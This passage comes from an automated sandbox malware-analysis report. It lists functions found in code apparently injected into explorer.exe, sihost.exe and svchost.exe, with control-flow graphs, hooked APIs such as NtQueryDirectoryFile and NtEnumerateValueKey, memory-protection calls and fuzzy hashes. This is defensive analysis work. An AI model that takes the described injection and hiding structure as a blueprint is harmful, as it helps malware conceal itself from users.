                                                                                                                                                                          control_flow_graph 54 1392270-1392288 55 139228b-13922f1 NtQueryDirectoryFile 54->55 56 1392394-1392398 55->56 57 13922f7-13922fc 55->57 57->56 58 1392302-1392309 57->58 58->56 59 139230f-139231b call 1392196 58->59 62 139231d-1392320 59->62 63 1392322-1392326 59->63 64 1392385-139238a 62->64 65 1392328-139232d 63->65 66 1392372-1392375 63->66 64->56 69 139238c-139238f 64->69 70 139232f 65->70 71 1392336-1392339 65->71 67 139237f-1392383 66->67 68 1392377-139237d 66->68 67->64 68->64 69->59 70->55 72 139233b-1392345 71->72 73 1392347-1392355 71->73 72->56 72->73 74 1392363 73->74 75 1392357-1392361 73->75 76 1392365-1392370 74->76 75->76 76->64
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtQueryDirectoryFile.NTDLL ref: 013922E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryFileQuery
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3295332484-0
                                                                                                                                                                          • Opcode ID: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
                                                                                                                                                                          • Instruction ID: 2de871f163555cbda5ee5fb693cc3dc0d9c8073269b2e6f0d5cab27084672791
                                                                                                                                                                          • Opcode Fuzzy Hash: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
                                                                                                                                                                          • Instruction Fuzzy Hash: D741F470618E4E9FDF95EF5CC8C8BAA7BE4FB69359F40016AE909C7250D730D8848B41
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01391EE1 Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 119 1391ee1-1391f5d NtCreateUserProcess
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateProcessUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2217836671-0
                                                                                                                                                                          • Opcode ID: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
                                                                                                                                                                          • Instruction ID: 32af6664475258df2025926b18748e272a5399bca74b2e2a3e5bffc18d134367
                                                                                                                                                                          • Opcode Fuzzy Hash: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
                                                                                                                                                                          • Instruction Fuzzy Hash: 30114C74908A8C8FDFC4EF6CC488A697BE0FB68355F54062AB859C32A0D775D8948B41
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01391D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction ID: fdd2848cf78507cda9bbc6fa95236549967ab3c72e8ac319d269252cfd9322b7
                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction Fuzzy Hash: 0021D630A34C1E0BFB58A27C9859764F6D2E79C220F980295E90DE36D4ED58CC8183C6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 03450811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.3004595079.0000000003450000.00000040.00000400.00020000.00000000.sdmp, Offset: 03450000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_3450000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 0ca58f45a831e95129f7947333f4d333a2c2c7856451a491e6b2d099f79754c5
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: C131C57A8003047FEF01BF709D46EAA776CEF01310F04016BBD86DE1A6DA744954CAB9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01390811 Relevance: 1.6, APIs: 1, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3424019298-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: de1639bc68694eddd94409e849f198f8ffd8fa0804a42f374ba823ae9a72a72a
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: BE313772514206BFEF067F749D86ABA3FACEF10318F040165BD95EE0A5EA304964CBB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 013908B3 Relevance: 1.5, APIs: 1, Instructions: 14threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3424019298-0
                                                                                                                                                                          • Opcode ID: e4423c0a58cdb4c7a61b8c611d717cf6067e42c28c7b42a6ea57d7b01533138c
                                                                                                                                                                          • Instruction ID: 27b28d2f442fd771626c8c0eed648b75e2cd5673a9a19ca2b0335d9e7fd0978f
                                                                                                                                                                          • Opcode Fuzzy Hash: e4423c0a58cdb4c7a61b8c611d717cf6067e42c28c7b42a6ea57d7b01533138c
                                                                                                                                                                          • Instruction Fuzzy Hash: 9BC09B27A7490707CF18777C6C5906C795CED3113E7C05B35F467E8095DC35451642A6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:8.6%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:105
                                                                                                                                                                          Total number of Limit Nodes:6
                                                                                                                                                                          execution_graph 2601 ac08d9 2607 ac0cc4 2601->2607 2603 ac08e5 2610 ac0643 2603->2610 2605 ac08ef 2618 ac093e 2605->2618 2625 ac0c3f GetPEB 2607->2625 2609 ac0cc9 2609->2603 2611 ac0660 2610->2611 2627 ac067c 2611->2627 2613 ac0673 2633 ac06c2 2613->2633 2615 ac080f 2615->2605 2616 ac06b9 2616->2615 2637 ac0811 2616->2637 2619 ac0cc4 GetPEB 2618->2619 2621 ac094a 2619->2621 2620 ac0af1 2620->2605 2621->2620 2679 ac09d9 2621->2679 2624 ac09d2 2624->2620 2683 ac0af3 2624->2683 2626 ac0c4b 2625->2626 2626->2609 2626->2626 2628 ac0681 2627->2628 2629 ac06c2 4 API calls 2628->2629 2631 ac06b9 2629->2631 2630 ac080f 2630->2613 2631->2630 2632 ac0811 4 API calls 2631->2632 2632->2630 2635 ac06c7 2633->2635 2634 ac080f 2634->2616 2635->2634 2636 ac0811 4 API calls 2635->2636 2636->2634 2650 ac086e 2637->2650 2639 ac0840 2640 ac08c5 2639->2640 2641 ac0866 2639->2641 2643 ac08d9 2639->2643 2665 ac08d9 2640->2665 2641->2615 2655 ac1e62 2641->2655 2645 ac0cc4 GetPEB 2643->2645 2646 ac08e5 2645->2646 2647 ac0643 4 API calls 2646->2647 2648 ac08ef 2647->2648 2649 ac093e 4 API calls 2648->2649 2649->2648 2651 ac0873 2650->2651 2651->2639 2652 ac1e62 3 API calls 2651->2652 2653 ac08c7 2652->2653 2654 ac08d9 4 API calls 2653->2654 2654->2653 2656 ac1e73 2655->2656 2671 ac1d5a 2656->2671 2659 ac1d5a 3 API calls 2660 ac1eb9 2659->2660 2661 ac1d5a 3 API calls 2660->2661 2662 ac1ecc 2661->2662 2663 ac1d5a 3 API calls 2662->2663 2664 ac1edf 2663->2664 2664->2640 2666 ac0cc4 GetPEB 2665->2666 2667 ac08e5 2666->2667 2668 ac0643 4 API calls 2667->2668 2669 ac08ef 2668->2669 2670 ac093e 4 API calls 2669->2670 2670->2669 2672 ac1d6e 2671->2672 2673 ac1e60 2671->2673 2672->2673 2674 ac1d80 VirtualProtect 2672->2674 2673->2659 2674->2673 2675 ac1dac 2674->2675 2676 ac1daf VirtualAlloc 2675->2676 2676->2676 2677 ac1de1 2676->2677 2678 ac1e09 VirtualProtect 2677->2678 2678->2673 2682 ac09de 2679->2682 2680 ac0af3 4 API calls 2681 ac0af1 2680->2681 2681->2624 2682->2680 2682->2681 2685 ac0b01 2683->2685 2686 ac0cc4 GetPEB 2685->2686 2687 ac0b0d 2686->2687 2692 ac0b27 2687->2692 2689 ac0b20 2691 ac0b57 2689->2691 2696 ac0b65 2689->2696 2693 ac0b2c 2692->2693 2694 ac0b65 4 API calls 2693->2694 2695 ac0b57 2694->2695 2695->2689 2697 ac0b6a 2696->2697 2702 ac08b3 2697->2702 2704 ac08b9 2702->2704 2706 ac08c7 2702->2706 2703 ac08d9 4 API calls 2703->2706 2705 ac1e62 3 API calls 2704->2705 2705->2706 2706->2703 2721 ac0b6b 2723 ac0b7d 2721->2723 2722 ac08b3 4 API calls 2724 ac0bb1 2722->2724 2723->2722 2725 ac0c3f GetPEB 2724->2725 2726 ac0bb6 2725->2726 2707 ac21d1 2710 ac21f2 2707->2710 2708 ac2211 NtEnumerateValueKey 2709 ac226c 2708->2709 2708->2710 2710->2708 2710->2709 2711 ac1e62 2712 ac1e73 2711->2712 2713 ac1d5a 3 API calls 2712->2713 2714 ac1ea6 2713->2714 2715 ac1d5a 3 API calls 2714->2715 2716 ac1eb9 2715->2716 2717 ac1d5a 3 API calls 2716->2717 2718 ac1ecc 2717->2718 2719 ac1d5a 3 API calls 2718->2719 2720 ac1edf 2719->2720

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00AC21D1 Relevance: 1.6, APIs: 1, Instructions: 83nativeCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 47 ac21d1-ac21f0 48 ac21f8-ac21fd 47->48 49 ac21f2-ac21f6 47->49 51 ac21ff-ac2203 48->51 52 ac2205-ac2208 48->52 50 ac220a-ac220e 49->50 53 ac2211-ac2244 NtEnumerateValueKey 50->53 51->50 52->53 54 ac226c-ac226f 53->54 55 ac2246-ac2249 53->55 55->54 56 ac224b-ac2256 call ac2196 55->56 59 ac225e-ac2261 56->59 60 ac2258-ac225c 56->60 59->54 61 ac2263-ac226a 59->61 60->59 61->53
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.2968002124.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnumerateValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1749906896-0
                                                                                                                                                                          • Opcode ID: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
                                                                                                                                                                          • Instruction ID: cdfd058294846393527a23a69d82aed125c299c38b3c44931be5a47ac5480816
                                                                                                                                                                          • Opcode Fuzzy Hash: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
                                                                                                                                                                          • Instruction Fuzzy Hash: F3213D31518E5D8F8F55EF1C8809FEA37E1FB68755B42032AAC19E3200D730D98087C1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00AC1D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.2968002124.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction ID: dd34eb1389eaef043c92a696ed53661b54a7e883a9eaaee22049f10a42ac24d8
                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction Fuzzy Hash: E221F730B34C1D0BEB58A77C9859764F6D2E79C320F990299E91ED36E5ED58CC8183C6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00AC0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 11 ac0811-ac0846 call ac086e 14 ac08ad-ac08ae 11->14 15 ac0848-ac0851 11->15 16 ac08af-ac08b0 14->16 15->16 17 ac0853-ac085c 15->17 18 ac08b9-ac08cc call ac1756 call ac1e62 16->18 19 ac085e 17->19 20 ac08d0 17->20 23 ac08d4 call ac08d9 18->23 21 ac08c5-ac08cc 19->21 22 ac0860-ac0861 19->22 20->23 21->20 22->18 26 ac0863 22->26 28 ac08d9-ac0906 call ac0cc4 call ac14bc call ac0643 call ac0ce8 26->28 29 ac0866-ac086f 26->29 44 ac090b-ac090f 28->44 32 ac089e-ac08a4 29->32 33 ac0871-ac0897 29->33 32->14 33->32 45 ac0939 call ac093e 44->45
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.2968002124.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 23dfea852a366a571cc3348c698cc6744426d11f639f151413aad9b7f5eb2e10
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 9231E472000204AFEF017F709E86FBA3BACEF11300F424169BD85DA0A2EA7449658BB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:4.9%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:69
                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                          execution_graph 2609 9108d9 2615 910cc4 2609->2615 2611 9108e5 2618 910643 2611->2618 2613 9108ef 2626 91093e 2613->2626 2633 910c3f GetPEB 2615->2633 2617 910cc9 2617->2611 2619 910660 2618->2619 2635 91067c 2619->2635 2621 910673 2641 9106c2 2621->2641 2623 91080f 2623->2613 2624 9106b9 2624->2623 2645 910811 2624->2645 2627 910cc4 GetPEB 2626->2627 2629 91094a 2627->2629 2628 910af1 2628->2613 2629->2628 2665 9109d9 2629->2665 2632 9109d2 2632->2628 2669 910af3 2632->2669 2634 910c4b 2633->2634 2634->2617 2634->2634 2636 910681 2635->2636 2637 9106c2 GetPEB 2636->2637 2639 9106b9 2637->2639 2638 91080f 2638->2621 2639->2638 2640 910811 GetPEB 2639->2640 2640->2638 2643 9106c7 2641->2643 2642 91080f 2642->2624 2643->2642 2644 910811 GetPEB 2643->2644 2644->2642 2656 91086e 2645->2656 2647 910840 2649 9108d9 2647->2649 2650 910866 2647->2650 2651 910cc4 GetPEB 2649->2651 2650->2623 2659 9108d9 2650->2659 2652 9108e5 2651->2652 2653 910643 GetPEB 2652->2653 2654 9108ef 2653->2654 2655 91093e GetPEB 2654->2655 2655->2654 2657 910873 2656->2657 2657->2647 2658 9108d9 GetPEB 2657->2658 2658->2657 2660 910cc4 GetPEB 2659->2660 2661 9108e5 2660->2661 2662 910643 GetPEB 2661->2662 2663 9108ef 2662->2663 2664 91093e GetPEB 2663->2664 2664->2663 2668 9109de 2665->2668 2666 910af3 GetPEB 2667 910af1 2666->2667 2667->2632 2668->2666 2668->2667 2671 910b01 2669->2671 2672 910cc4 GetPEB 2671->2672 2673 910b0d 2672->2673 2678 910b27 2673->2678 2675 910b20 2682 910b65 2675->2682 2679 910b2c 2678->2679 2680 910b65 GetPEB 2679->2680 2681 910b57 2679->2681 2680->2681 2681->2675 2686 910b6a 2682->2686 2688 9108b3 2686->2688 2689 9108b9 2688->2689 2690 9108d9 GetPEB 2689->2690 2690->2689 2691 910b6b 2693 910b7d 2691->2693 2692 9108b3 GetPEB 2694 910bb1 2692->2694 2693->2692 2695 910c3f GetPEB 2694->2695 2696 910bb6 2695->2696

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00910811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.2967861512.0000000000910000.00000040.00000001.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_910000_svchost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 0bb578ed6cec17c8f136f477abcb2608ff25218c2125ec3b643453ee16afebde
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: DE31D67220420C7FEB017B709D46BFA3B6CEF91300F4001A5BD85DA0A2DAB649D5CBB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:4.9%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:69
                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                          execution_graph 2691 9a0b6b 2692 9a0b7d 2691->2692 2693 9a08b3 GetPEB 2692->2693 2694 9a0bb1 2693->2694 2695 9a0c3f GetPEB 2694->2695 2696 9a0bb6 2695->2696 2609 9a08d9 2615 9a0cc4 2609->2615 2611 9a08e5 2618 9a0643 2611->2618 2613 9a08ef 2626 9a093e 2613->2626 2633 9a0c3f GetPEB 2615->2633 2617 9a0cc9 2617->2611 2619 9a0660 2618->2619 2635 9a067c 2619->2635 2621 9a0673 2641 9a06c2 2621->2641 2623 9a080f 2623->2613 2624 9a06b9 2624->2623 2645 9a0811 2624->2645 2627 9a0cc4 GetPEB 2626->2627 2629 9a094a 2627->2629 2628 9a0af1 2628->2613 2629->2628 2665 9a09d9 2629->2665 2631 9a09d2 2631->2628 2669 9a0af3 2631->2669 2634 9a0c4b 2633->2634 2634->2617 2634->2634 2636 9a0681 2635->2636 2637 9a06c2 GetPEB 2636->2637 2639 9a06b9 2637->2639 2638 9a080f 2638->2621 2639->2638 2640 9a0811 GetPEB 2639->2640 2640->2638 2643 9a06c7 2641->2643 2642 9a080f 2642->2624 2643->2642 2644 9a0811 GetPEB 2643->2644 2644->2642 2656 9a086e 2645->2656 2647 9a0840 2649 9a08d9 2647->2649 2650 9a0866 2647->2650 2651 9a0cc4 GetPEB 2649->2651 2650->2623 2659 9a08d9 2650->2659 2652 9a08e5 2651->2652 2653 9a0643 GetPEB 2652->2653 2654 9a08ef 2653->2654 2655 9a093e GetPEB 2654->2655 2655->2654 2657 9a0873 2656->2657 2657->2647 2658 9a08d9 GetPEB 2657->2658 2658->2657 2660 9a0cc4 GetPEB 2659->2660 2661 9a08e5 2660->2661 2662 9a0643 GetPEB 2661->2662 2663 9a08ef 2662->2663 2664 9a093e GetPEB 2663->2664 2664->2663 2668 9a09de 2665->2668 2666 9a0af3 GetPEB 2667 9a0af1 2666->2667 2667->2631 2668->2666 2668->2667 2671 9a0b01 2669->2671 2672 9a0cc4 GetPEB 2671->2672 2673 9a0b0d 2672->2673 2678 9a0b27 2673->2678 2675 9a0b20 2682 9a0b65 2675->2682 2679 9a0b2c 2678->2679 2680 9a0b65 GetPEB 2679->2680 2681 9a0b57 2679->2681 2680->2681 2681->2675 2683 9a0b6a 2682->2683 2688 9a08b3 2683->2688 2690 9a08b9 2688->2690 2689 9a08d9 GetPEB 2689->2690 2690->2689

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 009A0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.2965568400.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_9a0000_svchost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 87a61ee7780fe3dd6be775b2a921c89204c80ea1769b2b74f3f30dd65b7be30b
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: DB31E6724102046FEB017B749D4ABBA7BACEF92310F000165BD85DA0A6EA7549648AFA
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:8.3%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:101
                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                          execution_graph 2502 a51e62 2503 a51e73 2502->2503 2512 a51d5a 2503->2512 2506 a51d5a 3 API calls 2507 a51eb9 2506->2507 2508 a51d5a 3 API calls 2507->2508 2509 a51ecc 2508->2509 2510 a51d5a 3 API calls 2509->2510 2511 a51edf 2510->2511 2513 a51e60 2512->2513 2514 a51d6e 2512->2514 2513->2506 2514->2513 2515 a51d80 VirtualProtect 2514->2515 2515->2513 2516 a51dac 2515->2516 2517 a51daf VirtualAlloc 2516->2517 2517->2517 2518 a51de1 2517->2518 2519 a51e09 VirtualProtect 2518->2519 2519->2513 2520 a508d9 2526 a50cc4 2520->2526 2522 a508e5 2529 a50643 2522->2529 2524 a508ef 2537 a5093e 2524->2537 2544 a50c3f GetPEB 2526->2544 2528 a50cc9 2528->2522 2530 a50660 2529->2530 2546 a5067c 2530->2546 2532 a50673 2552 a506c2 2532->2552 2534 a5080f 2534->2524 2535 a506b9 2535->2534 2556 a50811 2535->2556 2538 a50cc4 GetPEB 2537->2538 2540 a5094a 2538->2540 2539 a50af1 2539->2524 2540->2539 2590 a509d9 2540->2590 2543 a509d2 2543->2539 2594 a50af3 2543->2594 2545 a50c4b 2544->2545 2545->2528 2545->2545 2547 a50681 2546->2547 2548 a506c2 4 API calls 2547->2548 2550 a506b9 2548->2550 2549 a5080f 2549->2532 2550->2549 2551 a50811 4 API calls 2550->2551 2551->2549 2554 a506c7 2552->2554 2553 a5080f 2553->2535 2554->2553 2555 a50811 4 API calls 2554->2555 2555->2553 2569 a5086e 2556->2569 2558 a508c5 2584 a508d9 2558->2584 2559 a50840 2559->2558 2560 a50866 2559->2560 2562 a508d9 2559->2562 2560->2534 2574 a51e62 2560->2574 2564 a50cc4 GetPEB 2562->2564 2565 a508e5 2564->2565 2566 a50643 4 API calls 2565->2566 2567 a508ef 2566->2567 2568 a5093e 4 API calls 2567->2568 2568->2567 2570 a50873 2569->2570 2570->2559 2571 a51e62 3 API calls 2570->2571 2572 a508c7 2571->2572 2573 a508d9 4 API calls 2572->2573 2573->2572 2575 a51e73 2574->2575 2576 a51d5a 3 API calls 2575->2576 2577 a51ea6 2576->2577 2578 a51d5a 3 API calls 2577->2578 2579 a51eb9 2578->2579 2580 a51d5a 3 API calls 2579->2580 2581 a51ecc 2580->2581 2582 a51d5a 3 API calls 2581->2582 2583 a51edf 2582->2583 2583->2558 2585 a50cc4 GetPEB 2584->2585 2586 a508e5 2585->2586 2587 a50643 4 API calls 2586->2587 2588 a508ef 2587->2588 2589 a5093e 4 API calls 2588->2589 2589->2588 2591 a509de 2590->2591 2592 a50af3 4 API calls 2591->2592 2593 a50af1 2591->2593 2592->2593 2593->2543 2596 a50b01 2594->2596 2597 a50cc4 GetPEB 2596->2597 2598 a50b0d 2597->2598 2603 a50b27 2598->2603 2600 a50b20 2602 a50b57 2600->2602 2607 a50b65 2600->2607 2604 a50b2c 2603->2604 2605 a50b65 4 API calls 2604->2605 2606 a50b57 2605->2606 2606->2600 2611 a50b6a 2607->2611 2613 a508b3 2611->2613 2614 a508c7 2613->2614 2615 a508b9 2613->2615 2616 a508d9 4 API calls 2614->2616 2617 a51e62 3 API calls 2615->2617 2616->2614 2617->2614 2618 a50b6b 2620 a50b7d 2618->2620 2619 a508b3 4 API calls 2621 a50bb1 2619->2621 2620->2619 2622 a50c3f GetPEB 2621->2622 2623 a50bb6 2622->2623

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00A51D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
